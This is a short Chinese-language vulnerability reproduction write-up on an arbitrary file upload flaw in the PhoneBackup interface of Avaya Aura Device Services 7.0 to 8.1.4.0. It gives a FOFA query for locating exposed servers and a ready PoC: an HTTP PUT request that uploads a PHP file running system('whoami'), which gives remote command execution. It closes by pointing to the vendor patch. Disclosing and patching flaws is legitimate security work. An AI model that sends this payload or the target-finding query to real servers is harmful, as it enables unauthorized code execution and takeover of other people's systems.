0x01 产品简介

Avaya Aura Device Services是美国Avaya公司的一个应用软件。提供一个管理 Avaya 端点功能。

0x02 漏洞概述

Avaya Aura Device Services 系统PhoneBackup接口处存在任意文件上传漏洞，攻击者可绕过验证上传任意文件获取服务器权限。

0x03 影响范围

Avaya Aura Device Services  7.0-8.1.4.0版本

0x04 复现环境

FOFA：app="AVAYA-Aura-Utility-Server"

0x05 漏洞复现

PoC

PUT /PhoneBackup/123.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: AVAYA
Content-Length: 23<?php system('whoami');

PS：简单粗暴，直接put上传

验证

0x06 修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://support.avaya.com/。